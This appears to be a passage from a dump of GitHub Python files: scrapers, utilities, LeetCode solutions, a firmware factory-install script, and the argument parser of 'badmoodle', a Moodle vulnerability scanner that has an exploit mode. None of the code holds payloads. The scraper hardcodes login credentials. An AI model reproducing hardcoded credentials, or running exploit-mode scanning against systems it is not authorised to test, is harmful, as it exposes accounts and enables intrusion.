indTrue#{\"True\":indTrue,\"False\":indFalse}\n \ndef new_index(sub,Ngrid,nppix, error_elipse=0.01):#numero por pixel\n #timei = time.time()\n nlim = int(nppix)\n ind = []\n xg = np.linspace(sub['x'].min(),sub['x'].max(),endpoint=True,num=Ngrid)\n yg = np.linspace(sub['y'].min(),sub['y'].max(),endpoint=True,num=Ngrid)\n Nx = len(xg)\n Ny = len(yg)\n Xd = sub['x']\n Yd = sub['y']\n for iy in range(Ny-1):\n for ix in range(Nx-1):\n ind_ = np.where((Xd>=xg[ix])*(Xd<=xg[ix+1])*(Yd>=yg[iy])*(Yd<=yg[iy+1]))[0]\n n = len(ind_)\n if n>nlim:\n count = int(n-nlim)\n ind_ = np.random.permutation(ind_)[:count]\n ind = np.concatenate([ind,ind_])\n ind = np.unique(ind).astype(int)\n indn = np.setdiff1d(np.arange(len(Xd)),ind)\n indElipse = elipse(sub, error=0.01)\n indn = np.setdiff1d(indn,indElipse)\n #print(\"tempo: {0:.3f} sec\".format(-timei + time.time()))\n #print(\"antes = {}, depois = {}\".format(len(Xd),len(indn)))\n return indn\n","repo_name":"multinverse/BINGO_OpticalDesign","sub_path":"Resampling.py","file_name":"Resampling.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2485173127","text":"\n\n\n# 这显然是一个二分查找\n\n\ndef searchInsert(nums, target: int) -> int:\n n = len(nums)\n l=0\n r=n-1\n\n while(l<=r):\n mid = (l+r)//2\n if nums[mid]==target:\n # 由于题目给定了无重的条件,可以直接返回\n return mid\n elif nums[mid] > target:\n r = mid-1\n else:\n l = mid+1\n\n return l\n\nprint(searchInsert([1,3,5,6],0))","repo_name":"August1s/LeetCode","sub_path":"Array/No35搜索插入位置.py","file_name":"No35搜索插入位置.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74438670771","text":"import atexit\nfrom threading import Thread, Lock\n\nimport gobject\nimport dbus\nfrom dbus.mainloop.glib import DBusGMainLoop\n\n\nclass Bus(object):\n\n def __init__(self, bus, iface, path):\n self.bus = bus\n self.iface = iface\n self.path = path\n\n def add_callback(self, func, name, iface=None, path=None):\n if iface is None:\n iface = self.iface\n return self.bus.add_signal_receiver(\n func, dbus_interface=iface,\n signal_name=name, path=path)\n\n def get_interface(self, iface=None, path=None):\n if iface is None:\n iface = self.iface\n if path is None:\n path = self.path\n obj = self.bus.get_object(self.iface, path)\n return dbus.Interface(obj, dbus_interface=iface)\n\n def get_prop_interface(self, iface=None, path=None):\n if iface is None:\n iface = self.iface\n return Prop(self.get_interface(dbus.PROPERTIES_IFACE, path), iface)\n\n\n_DBUS_INSTANCE = None\n_DBUS_INSTANCE_LOCK = Lock()\n\nclass Dbus(object):\n\n def __init__(self):\n bus_loop = DBusGMainLoop(set_as_default=True)\n gobject.threads_init()\n dbus.mainloop.glib.threads_init()\n self.main_loop = gobject.MainLoop()\n self.thread = Thread(target=self.main_loop.run,\n name='glib_dbus_main_loop')\n self.thread.daemon = True\n self.thread.start()\n self.system_bus = dbus.SystemBus(mainloop=bus_loop)\n self.session_bus = dbus.SessionBus(mainloop=bus_loop)\n\n def unload(self):\n self.main_loop.quit()\n self.session_bus.close()\n self.system_bus.close()\n self.thread.join()\n\n\ndef get_system_bus(iface, path):\n if _DBUS_INSTANCE is None:\n _init_dbus_instance()\n return Bus(_DBUS_INSTANCE.system_bus, iface, path)\n\ndef get_session_bus(iface, path):\n if _DBUS_INSTANCE is None:\n _init_dbus_instance()\n return Bus(_DBUS_INSTANCE.session_bus, iface, path)\n\n\ndef _init_dbus_instance():\n global _DBUS_INSTANCE\n with _DBUS_INSTANCE_LOCK:\n if _DBUS_INSTANCE is not None:\n return\n _DBUS_INSTANCE = Dbus()\n\n@atexit.register\ndef _unload_dbus_instance():\n global _DBUS_INSTANCE\n with _DBUS_INSTANCE_LOCK:\n if _DBUS_INSTANCE is None:\n return\n _DBUS_INSTANCE.unload()\n _DBUS_INSTANCE = None\n\n\n_DICT_METHODS = set(('keys', 'iterkeys',\n 'values', 'itervalues',\n 'items', 'iteritems'))\n\nclass Prop(object):\n\n def __init__(self, prop, iface):\n self.prop = prop\n self.iface = iface\n\n def __getattr__(self, name):\n if name in _DICT_METHODS:\n return getattr(self.prop.GetAll(self.iface), name)\n return self.prop.Get(self.iface, name)\n\n def __getitem__(self, name):\n return self.prop.Get(self.iface, name)\n\n def __len__(self):\n return len(self.prop.GetAll(self.iface))\n\n def __iter__(self):\n return self.prop.GetAll(self.iface).iterkeys()\n\n def __list__(self):\n return list(self.prop.GetAll(self.iface))\n\n def __contains__(self, item):\n return item in self.prop.GetAll(self.iface)\n","repo_name":"epontan/python-wmiirc-plugins","sub_path":"dbus_instance.py","file_name":"dbus_instance.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13338290163","text":"from lxml import html, etree\r\nimport requests\r\nimport numpy as np\r\nimport sys\r\nimport pickle\r\nimport time #DEBUG\r\n\r\nMIN_WORD_COUNT = 100\r\nMAX_WORD_COUNT = 1500\r\nMIN_RR_OCCURENCE = 3\r\nMIN_RATIO = 0.05\r\nSEARCHED_PHONEME = 'rr'\r\nWEBSITE_LINK = 'https://rhinospike.com'\r\nEMAIL = 'doerinrw'\r\nPASSWORD = 'password'\r\n\r\ndef readLangPage(num):\r\n '''readLangPage\r\n This method is built to read a single page of the \"sort by language\" search pages,\r\n with no search string given. \r\n num: The index of the search page to be processed. \r\n \r\n Returns: A dictionary, containing string URLs of valid pages,\r\n keyed to the ratio of trilled RRs for each.'''\r\n validPages = {}\r\n page = requests.get('https://rhinospike.com/language/spa/recordings/?page=' + str(num))\r\n tree = html.fromstring(page.content)\r\n \r\n \r\n nextTitleTreeName = '//*[@id=\"left_panel\"]/div/div/div/table/tbody/tr/td[2]/div/span[3]/a' \r\n nextWordCountTreeName = '//*[@id=\"left_panel\"]/div/div/div/table/tbody/tr/td[2]/div[3]/span'\r\n\r\n\r\n for i in range(2, 12):\r\n #//*[@id=\"left_panel\"]/div/div[1]/div[2]\r\n #//*[@id=\"left_panel\"]/div/div[1]/div[1]\r\n\r\n #This block gets the title and link from the title element\r\n titleTree = tree.xpath(nextTitleTreeName)\r\n link = WEBSITE_LINK + titleTree[0].get('href')\r\n title = titleTree[0].text\r\n\r\n #This block gets the path to the hidden text using the unique ID number drawn from the link value\r\n recordingIDNumber = link.split('/')[-2]\r\n textTreeName = '//*[@id=\"audio_request_{0}\"]'.format(recordingIDNumber)\r\n textTree = tree.xpath(textTreeName)\r\n\r\n #This block gets the actual text itself\r\n text = ''\r\n for element in textTree[0].getchildren():\r\n paragraphText = element.text\r\n if paragraphText != None:#has to check for breaks that would create a type error\r\n text += paragraphText \r\n \r\n #This block gets the word count total as an integer\r\n wordCountTree = tree.xpath(nextWordCountTreeName)\r\n wordCount = wordCountTree[0].text.split()[0] #gets a string of just the number, without ' Words'\r\n wordCount = int(wordCount)\r\n\r\n\r\n #Now, all that's left is to do analysis of the gathered values, determining validity of the recording. \r\n RRcount = text.count(SEARCHED_PHONEME)\r\n validExample = wordCount > MIN_WORD_COUNT and wordCount < MAX_WORD_COUNT and RRcount >= MIN_RR_OCCURENCE\r\n if validExample:\r\n print('RR count:', RRcount) #DEBUG\r\n validPages[link] = RRcount \r\n\r\n nextTitleTreeName = '//*[@id=\"left_panel\"]/div/div/div[{0}]/table/tbody/tr/td[2]/div/span[3]/a'.format(str(i))\r\n nextWordCountTreeName = '//*[@id=\"left_panel\"]/div/div/div[{0}]/table/tbody/tr/td[2]/div[3]/span'.format(str(i))\r\n\r\n return validPages\r\n\r\n\r\n\r\ndef readSearchPage(num):\r\n '''readSearchPage\r\n This method is built to read a single page of the normal search pages,\r\n with some sort of search string given. \r\n num: The index of the search page to be processed. \r\n \r\n Returns: A dictionary, containing string URLs of valid pages,\r\n keyed to the ratio of trilled RRs for each.'''\r\n\r\n validPages = {}\r\n page = requests.get('https://rhinospike.com/search/?page=' + str(num) + '&q=rr&language=2')\r\n tree = html.fromstring(page.content)\r\n\r\n for i in range(1, 11):\r\n titleTree = tree.xpath('//*[@id=\"left_panel\"]/div/div[' + str(i) \r\n + ']/table/tbody/tr/td[2]/div[1]/span[3]/a')\r\n wordCountTree = tree.xpath('//*[@id=\"left_panel\"]/div/div[' + str(i) \r\n + ']/table/tbody/tr/td[2]/div[3]/span[1]')\r\n\r\n #Quick and dirty fix for an error where the first element doesn't work properly\r\n if i == 1:\r\n titleTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/table/tbody/tr/td[2]/div/span[3]/a')\r\n wordCountTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/table/tbody/tr/td[2]/div[3]/span')\r\n\r\n link = WEBSITE_LINK + titleTree[0].get('href')\r\n title = titleTree[0].text\r\n\r\n #indexing at end gets a string of just the number, without ' Words'\r\n wordCount = wordCountTree[0].text[:-6]\r\n wordCount = int(wordCount)\r\n\r\n if wordCount > MIN_WORD_COUNT and wordCount < MAX_WORD_COUNT:\r\n validPages[title] = link\r\n return validPages\r\n\r\ndef getTranscript(link):\r\n page = requests.get(link)\r\n tree = html.fromstring(page.content)\r\n\r\n textTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/div/div[2]')\r\n text = ''\r\n for element in textTree[0].getchildren():\r\n text += element.text\r\n return text\r\n\r\ndef processPage(link, mod):\r\n '''\r\n processPage\r\n DEPRECIATED, as it fails to properly login to download the files. \r\n link: a link to the page to be processed\r\n session: a session object that's already logged in\r\n mode: determines which folder to save the results to. \r\n Can be 'test', 'training', or 'cv'.\r\n '''\r\n page = requests.get(url=link, auth=auth) \r\n tree = html.fromstring(page.content)\r\n\r\n textTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/div/div[2]')\r\n text = ''\r\n for element in textTree[0].getchildren():\r\n text += element.text\r\n\r\n if text.count(SEARCHED_PHONEME) < MIN_RR_OCCURENCE:\r\n return False\r\n\r\n #Fetches the link from the transcription page\r\n downloadTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/div/ul/li/span[3]/a')\r\n\r\n for element in tree.xpath(\"//*[@id='left_panel']/div/div/div/ul/li/span[3]/a\"):\r\n print(element.get('href'))\r\n #If the top link is locked behind a paywall, it skips it. \r\n # for child in tree.xpath('//*[@id=\"left_panel\"]/div/div/div/ul')[0].iterchildren():\r\n # print('Recorder Name:', child.find('/a/strong')[0].text)\r\n # print('Child:', len(child.find('/span[3]')))\r\n #while downloadTree.text == 'Unlock' and count < 3:\r\n # downloadTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/div/ul/li[2]/span[3]/a')\r\n # count += 1\r\n downloadLink = WEBSITE_LINK + downloadTree[0].get('href')\r\n \r\n\r\n print('Download Link:', downloadLink) #DEBUG\r\n\r\n # Follows the link to the download page\r\n # downloadPage = requests.get(downloadLink)\r\n # downloadPageTree = html.fromstring(page.content)\r\n\r\n #Downloads the actual file\r\n # downloadLink = downloadPageTree.xpath('//*[@id=\"body\"]/p[4]/a')\r\n # downloadedFile = requests.get(downloadLink).content\r\n \r\n \r\n #Saves the file with the title of the transcription as its title\r\n # mp3Name = tree.xpath('//*[@id=\"left_panel\"]/div/div/div/table/tbody/tr/td[2]/div/span[3]/a')[0].text\r\n # mp3Name = '.\\Raw Data\\mp3\\\\' + mode + '\\\\'+ mp3Name + '.mp3'\r\n # song = open(mp3Name, 'wb')\r\n # song.write(downloadedFile)\r\n # song.close()\r\n return True\r\n\r\ndef rhinoSpikeLogin():\r\n '''\r\n Pulled from a helpful stackOverflow user: \r\n https://stackoverflow.com/questions/8316818/login-to-website-using-python/8316989#8316989\r\n\r\n '''\r\n # Start a session so we can have persistant cookies\r\n mySession = requests.Session()\r\n\r\n # This is the form data that the page sends when logging in\r\n login_data = {\r\n 'loginemail': EMAIL,\r\n 'loginpswd': PASSWORD,\r\n #'submit': 'Log in',\r\n }\r\n\r\n # Authenticate\r\n r = mySession.post(WEBSITE_LINK + '/account/login', data=login_data)\r\n print('Status Code:', r.status_code) #DEBUG\r\n \r\n return mySession\r\n\r\ndef saveObj(name, obj):\r\n '''saveObj\r\n Credit due to user Zah, from:\r\n https://stackoverflow.com/questions/19201290/how-to-save-a-dictionary-to-a-file'''\r\n with open(name + '.pkl', 'wb') as f:\r\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\r\n\r\ndef loadObj(name):\r\n '''loadObj\r\n Credit due to user Zah, from:\r\n https://stackoverflow.com/questions/19201290/how-to-save-a-dictionary-to-a-file'''\r\n with open(name + '.pkl', 'rb') as f:\r\n return pickle.load(f)\r\n\r\nif __name__ == '__main__':\r\n finalURLs = loadObj('validURLs')\r\n # finalURLs = {}\r\n print('{0} URLs loaded from previous runs.'.format(len(finalURLs)))\r\n for num in range(101, 500):\r\n validPages = readLangPage(num)\r\n print('Page {0} returned:'.format(num), validPages) #DEBUG\r\n finalURLs = dict(finalURLs, **validPages)\r\n print('Len:', len(finalURLs)) #DEBUG\r\n if num % 100 == 0:\r\n saveObj('validURLs', finalURLs)\r\n time.sleep(1000)\r\n \r\n saveObj('validURLs', finalURLs)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# '//*[@id=\"left_panel\"]/div/div[1]/table/tbody/tr/td[2]/div[3]/span[1]'\r\n# '//*[@id=\"left_panel\"]/div/div[2]/table/tbody/tr/td[2]/div[3]/span[1]'\r\n# '//*[@id=\"left_panel\"]/div/div[3]/table/tbody/tr/td[2]/div[3]/span[1]'\r\n\r\n \r\n\r\n\r\n","repo_name":"robbwdoering/AutoFono","sub_path":"webScraper.py","file_name":"webScraper.py","file_ext":"py","file_size_in_byte":8866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33901303663","text":"import datetime\nfrom typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar\n\nimport attr\nfrom dateutil.parser import isoparse\n\nif TYPE_CHECKING:\n from ..models.order_acknowledgement_item import OrderAcknowledgementItem\n from ..models.party_identification import PartyIdentification\n\n\nT = TypeVar(\"T\", bound=\"OrderAcknowledgement\")\n\n\n@attr.s(auto_attribs=True)\nclass OrderAcknowledgement:\n r\"\"\"\n Attributes:\n purchase_order_number (str): The purchase order number. Formatting Notes: 8-character alpha-numeric code.\n selling_party (PartyIdentification):\n acknowledgement_date (datetime.datetime): The date and time when the purchase order is acknowledged, in ISO-8601\n date/time format.\n items (List['OrderAcknowledgementItem']): A list of the items being acknowledged with associated details.\n \"\"\"\n\n purchase_order_number: str\n selling_party: \"PartyIdentification\"\n acknowledgement_date: datetime.datetime\n items: List[\"OrderAcknowledgementItem\"]\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n purchase_order_number = self.purchase_order_number\n selling_party = self.selling_party.to_dict()\n\n acknowledgement_date = self.acknowledgement_date.isoformat()\n\n items = []\n for items_item_data in self.items:\n items_item = items_item_data.to_dict()\n\n items.append(items_item)\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"purchaseOrderNumber\": purchase_order_number,\n \"sellingParty\": selling_party,\n \"acknowledgementDate\": acknowledgement_date,\n \"items\": items,\n }\n )\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.order_acknowledgement_item import OrderAcknowledgementItem\n from ..models.party_identification import PartyIdentification\n\n d = src_dict.copy()\n purchase_order_number = d.pop(\"purchaseOrderNumber\")\n\n selling_party = PartyIdentification.from_dict(d.pop(\"sellingParty\"))\n\n acknowledgement_date = isoparse(d.pop(\"acknowledgementDate\"))\n\n items = []\n _items = d.pop(\"items\")\n for items_item_data in _items:\n items_item = OrderAcknowledgementItem.from_dict(items_item_data)\n\n items.append(items_item)\n\n result = cls(\n purchase_order_number=purchase_order_number,\n selling_party=selling_party,\n acknowledgement_date=acknowledgement_date,\n items=items,\n )\n\n result.additional_properties = d\n return result\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"milyord/sp-api","sub_path":"sp/vendor_orders/models/order_acknowledgement.py","file_name":"order_acknowledgement.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38387096631","text":"import logging\n\nimport sqlalchemy.exc as exc\n\nimport config\n\n\ndef setup_logger():\n logger_ = logging.getLogger('Database')\n logger_.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)s - %(name)s: \"%(message)s\"'\n )\n\n stderr_handler = logging.StreamHandler()\n stderr_handler.setFormatter(formatter)\n logger_.addHandler(stderr_handler)\n\n if config.database_log_file is not None:\n file_handler = logging.FileHandler(config.database_log_file, encoding='utf-8')\n file_handler.setFormatter(formatter)\n logger_.addHandler(file_handler)\n\n return logger_\n\n\ndef log(func):\n def wrapper(*args, **kwargs):\n logger.info(f'Function {func.__module__}.{func.__name__} called with args: {args}, kwargs: {kwargs}')\n try:\n result = func(*args, **kwargs)\n logger.info(f'Function {func.__module__}.{func.__name__} returned {result}')\n return result\n except exc.SQLAlchemyError as e:\n logger.error(f'Function {func.__module__}.{func.__name__} raised {e}')\n raise exc.SQLAlchemyError(f\"{func.__module__}.{func.__name__}, error description: {e.args[0]}!\")\n\n return wrapper\n\n\nlogger = setup_logger()\n","repo_name":"Cub11k/lavochki-bot-df-2023","sub_path":"database/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7206171541","text":"# Number 1\ncount = 0\nraz = 100000000\ndata = []\nfor i in open('17-3.txt'):\n data.append(int(i))\nfor i in range(len(data) - 2):\n troyka = [data[i], data[i + 1], data[i + 2]]\n if troyka[0] <= troyka[1] <= troyka[2]:\n raz = min(raz, max(troyka) - min(troyka))\n count += 1\nprint('\\n#1:', count, raz)\n\n'-----------------------------------------------'\n\n# Number 2\ncount = 0\ndata = []\nfor i in open('17-4.txt'):\n data.append(int(i))\nnumbers = []\nfor i in data:\n if i % 3 == 0 and i % 9 != 0 and i % 10 >= 4:\n numbers.append(i)\nprint('#2:', len(numbers), sum(numbers) // len(numbers))\n\n'-----------------------------------------------'\n\n# Number 3\ncount = 0\ndata = []\nfor i in open('17-4.txt'):\n data.append(int(i))\nnumbers = []\nfor i in data:\n if i % 13 == 7 and i % 7 != 0 and i % 11 != 0:\n numbers.append(i)\nprint('#3:', max(numbers) - min(numbers), len(numbers))\n\n\n'''\n #1: 832 460\n #2: 247 5706\n #3: 8515 126\n'''\n","repo_name":"Andrey-Bedretdinov/School","sub_path":"Архив/Самостоятельные работы/Бедретдинов СР Вариант 3 14.12.21/Бедретдинов СР Вариант 3 14.12.21.py","file_name":"Бедретдинов СР Вариант 3 14.12.21.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70992273","text":"import requests\nimport datetime\nimport json\n\ndef send_application(url, vote_link, token, name='', position=None):\n\n request = {\n 'content': '',\n 'embeds': [\n {\n 'title': 'New application received!',\n 'icon_url': '',\n 'timestamp': datetime.datetime.utcnow().isoformat(),\n 'description':\n ('`{name}` has applied' + (' for '+position if position is not None else '') + \n '!\\n'\n '[Admin panel]({vote_link}/{token})\\n'\n '[Member voting]({vote_link})'\n '').format(name=name, vote_link=vote_link, token=token)\n }\n ]\n }\n\n headers = {'Content-Type': 'application/json'}\n\n request = json.dumps(request)\n response = requests.post(url, data=request, headers=headers)\n print('Sent discord webhook, response was ' + str(response))\n\n","repo_name":"lekro/frostcraft-web","sub_path":"web/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9370553443","text":"#!/usr/bin/env python\n'''\n run factory load, calibration and test\n'''\n\nfrom config import *\nimport configcheck\nimport logger\nimport accelcal\nimport jtag\nimport power_control\nimport time\nimport util\nimport sys, os, fcntl\nimport logger\nimport colour_text\nimport connection\nimport rotate\nimport barcode\nimport savedstate\n\nfh = open(os.path.realpath(__file__), 'r')\ntry:\n fcntl.flock(fh, fcntl.LOCK_EX|fcntl.LOCK_NB)\nexcept:\n print(\"another instance of this script is already running. exiting...\")\n sys.exit(0)\n\n# disable stdout buffering\nsys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)\n\nfrom argparse import ArgumentParser\nparser = ArgumentParser(description=__doc__)\n\nparser.add_argument(\"--test\", default=False, action='store_true', help=\"run in test loop\")\nparser.add_argument(\"--once\", default=False, action='store_true', help=\"run one install only\")\nparser.add_argument(\"--nofw\", default=False, action='store_true', help=\"don't reload firmware\")\nparser.add_argument(\"--erase\", default=False, action='store_true', help=\"erase firmware and parameters\")\nparser.add_argument(\"--monitor\", default=None, help=\"monitor address\")\nparser.add_argument(\"--barcode\", default=None, help=\"override barcode\")\nargs = parser.parse_args()\n\nif args.monitor:\n REMOTE_MONITOR['ref'] = args.monitor + \":16550\"\n REMOTE_MONITOR['test'] = args.monitor + \":16551\"\n\ncolour_text.print_blue(\"Starting up\")\n\ndef factory_install(device_barcode):\n '''main factory installer'''\n start_time = time.time()\n\n if not args.test:\n colour_text.clear_screen()\n\n # start a new log directory on each run\n logger.new_log_dir()\n logger.reopen_logfile()\n\n logdir = logger.get_log_dir()\n logger.info(\"Logging to %s\" % logdir)\n logger.info(\"Device barcode %s\" % device_barcode)\n\n colour_text.print_blue('''\n==================================================\n| Starting installation. Barcode is %s\n==================================================\n''' % device_barcode)\n\n logger.info(time.ctime())\n \n if args.erase:\n if not jtag.erase_firmwares():\n colour_text.print_fail('''\n======================================\n| FAILED: JTAG firmware erase failed\n======================================\n''')\n logger.critical(\"JTAG firmware erase failed\")\n return False\n \n if not args.nofw and not jtag.load_all_firmwares(retries=3):\n colour_text.print_fail('''\n======================================\n| FAILED: JTAG firmware install failed\n======================================\n''')\n logger.critical(\"JTAG firmware install failed\")\n try:\n conn = connection.Connection(ref_only=True)\n rotate.center_servos(conn)\n except Exception as ex:\n print(\"Failed to center servos: %s\" % ex)\n pass\n return False\n\n if args.erase:\n if not connection.erase_parameters():\n colour_text.print_fail('''\n==========================================\n| FAILED: Failed to erase parameters\n==========================================\n''')\n logger.critical(\"Failed to erase parameters\")\n return False\n\n if not accelcal.accel_calibrate_retries(retries=4):\n colour_text.print_fail('''\n==========================================\n| FAILED: Accelerometer calibration failed\n==========================================\n''')\n logger.critical(\"Accelerometer calibration failed\")\n return False\n\n # all OK\n colour_text.print_green('''\n================================================\n| Device: %s\n| PASSED: Factory install complete (%u seconds)\n================================================\n''' % (device_barcode, (time.time() - start_time)))\n logger.info(\"Factory install complete (%u seconds)\" % (time.time() - start_time))\n return True\n\n# load the jig state file\nsavedstate.init()\nsavedstate.reset('current_cycles')\n\nwhile True:\n logger.get_ftdi()\n jigstate = savedstate.get()\n logger.info(\"jigstate: total_cycles = %i\" % jigstate['total_cycles'])\n logger.info(\"jigstate: current_cycles = %i\" % jigstate['current_cycles'])\n\n util.kill_processes(['mavproxy.py', GDB])\n\n if args.test:\n # power cycle each time, simulating new board put in\n power_control.power_cycle()\n else:\n # wait for the power to be switched off, disable serial logging\n logger.info(\"waiting for power off\")\n util.wait_no_device([FMU_JTAG, IO_JTAG], timeout=600)\n\n device_barcode = args.barcode\n if not args.test and device_barcode is None:\n colour_text.print_blue('''\n==========================================\n| PLEASE SWIPE DEVICE BARCODE\n==========================================\n''')\n device_barcode = barcode.barcode_read()\n if device_barcode is None:\n colour_text.print_fail('''\n ==========================================\n | FAILED: Barcode not detected\n ==========================================\n ''')\n logger.critical(\"Barcode not detected\")\n time.sleep(2)\n continue\n \n # we don't use logger for the barcode here as we are still on the previous\n # boards log\n print(\"Got barcode: %s\" % device_barcode)\n logger.info(\"Barcode detected\")\n \n # wait for the power to come on again\n while not util.wait_devices([FMU_JTAG, IO_JTAG, FMU_DEBUG]):\n logger.info(\"waiting for power up....\")\n\n ret = factory_install(device_barcode)\n\n # increment the cycles counters\n savedstate.incr('current_cycles')\n savedstate.incr('total_cycles')\n\n if args.once:\n sys.exit(int(not ret))\n","repo_name":"tridge/FWLoad","sub_path":"factoryload.py","file_name":"factoryload.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"71387865333","text":"import sys\nimport argparse\n\nfrom utils.output import color\n\n\nclass CustomArgumentParser(argparse.ArgumentParser):\n\tdef format_usage(self):\n\t\tcustom_usage = super().format_usage()\n\t\tcustom_usage = custom_usage.replace('usage: ', color.BOLD + 'Usage: ' + color.END)\n\t\tcustom_usage = custom_usage.replace('optional arguments:', color.BOLD + 'Arguments:' + color.END)\n\t\treturn custom_usage\n\t\n\tdef format_help(self):\n\t\tcustom_help = super().format_help()\n\t\tcustom_help = custom_help.replace('usage: ', color.BOLD + 'Usage: ' + color.END)\n\t\tcustom_help = custom_help.replace('optional arguments:', color.BOLD + 'Arguments:' + color.END)\n\t\tcustom_help = custom_help.replace('show this help message and exit', 'Show this help message and exit')\n\t\treturn custom_help\n\t\n\tdef print_usage(self, file=sys.stdout):\n\t\tfile.write(self.format_usage() + 'Use -h or --help for more details\\n\\n')\n\n\ndef get_parser():\n\tformatter = lambda prog: argparse.HelpFormatter(prog, max_help_position=40, width=100)\n\tparser = CustomArgumentParser(formatter_class=formatter, usage='\\n{} [ARGUMENTS]\\n'.format(sys.argv[0]))\n\t\n\tparser.add_argument('-u', '--url', help='Moodle target URL')\n\tparser.add_argument('-a', '--auth', help='Moodle username and password (separated by \":\")')\n\tparser.add_argument('-p', '--proxy', help='Proxy used for connecting to moodle (ex: https://127.0.0.1:8080)')\n\tparser.add_argument('-H', '--header', help='Headers used for HTTP connections', action='append', nargs='?', dest='headers')\n\tparser.add_argument('-l', '--level', help='Level of tests to perform (default: 1)', type=int, default=1)\n\tparser.add_argument('-v', '--verbose', help='Verbosity level (default: 1)', type=int, default=1, dest='verbosity')\n\tparser.add_argument('-r', '--random-agent', help='Random User Agent (default: Chrome Win10)', action='store_const', const=True, dest='random_agent')\n\tparser.add_argument('-e', '--exploit', help='Enable exploit mode (default: check mode)', action='store_const', const=True)\n\tparser.add_argument('-s', '--scrape', help='Scraping mode: scrape all the pages from moodle and save the result in a JSON file (default: disabled)', action='store_const', const=True)\n\tparser.add_argument('-o', '--outfile', help='Output file to save scan results (in JSON format)')\n\tparser.add_argument('-m', '--list-modules', help='List all the community vulnerability modules', action='store_const', const=True, dest='list_modules')\n\tparser.add_argument('-U', '--update', help='Update badmoodle vulnerability database', action='store_const', const=True)\n\t\n\treturn parser\n\n\ndef parse_args():\n\treturn get_parser().parse_args()\n\n\ndef help():\n\treturn get_parser().print_help()\n\n\ndef usage():\n\treturn get_parser().print_usage()","repo_name":"cyberaz0r/badmoodle","sub_path":"utils/argparse.py","file_name":"argparse.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"18160246970","text":"import json\n\n# Define your input file containing a list of JSON objects\ninput_file = 'path/to/your/input_file.jsonl'\n\n# Define the output schema file\noutput_schema_file = 'json_schema.json'\n\n# Function to update the schema with the data from the given JSON object\ndef update_schema_with_object(schema, json_obj):\n for key, value in json_obj.items():\n if key not in schema:\n if isinstance(value, dict):\n schema[key] = {\n \"type\": \"object\",\n \"properties\": update_schema_with_object({}, value)\n }\n elif isinstance(value, list) and len(value) > 0 and isinstance(value[0], dict):\n schema[key] = {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": update_schema_with_object({}, value[0])\n }\n }\n else:\n schema[key] = {\n \"type\": type(value).__name__,\n \"example\": value\n }\n elif schema[key][\"type\"] == \"object\" and isinstance(value, dict):\n schema[key][\"properties\"] = update_schema_with_object(schema[key][\"properties\"], value)\n elif schema[key][\"type\"] == \"array\" and isinstance(value, list) and len(value) > 0 and isinstance(value[0], dict):\n schema[key][\"items\"][\"properties\"] = update_schema_with_object(schema[key][\"items\"][\"properties\"], value[0])\n\n return schema\n\n# Generate the JSON schema\ndef generate_json_schema(input_file):\n schema = {}\n with open(input_file, 'r') as file:\n for line in file:\n json_obj = json.loads(line.strip())\n schema = update_schema_with_object(schema, json_obj)\n return schema\n\n# Run the script and generate the JSON schema\njson_schema = generate_json_schema(input_file)\n\n# Write the JSON schema to a file\nwith open(output_schema_file, 'w') as outfile:\n json.dump(json_schema, outfile, indent=4)\n","repo_name":"jcha-ultra/toolkit","sub_path":"python_toolkit/json/extract_json_schema.py","file_name":"extract_json_schema.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32130170171","text":"\"\"\"\r\nCreate a program that allows him to input a certain amount of change, and then print how how many quarters, dimes, nickels, and pennies are needed to make up the amount needed. \r\nFor example, if he inputs 1.47, the program will tell that he needs $1 and 1 quarters, 2 dimes, 0 nickels, and 2 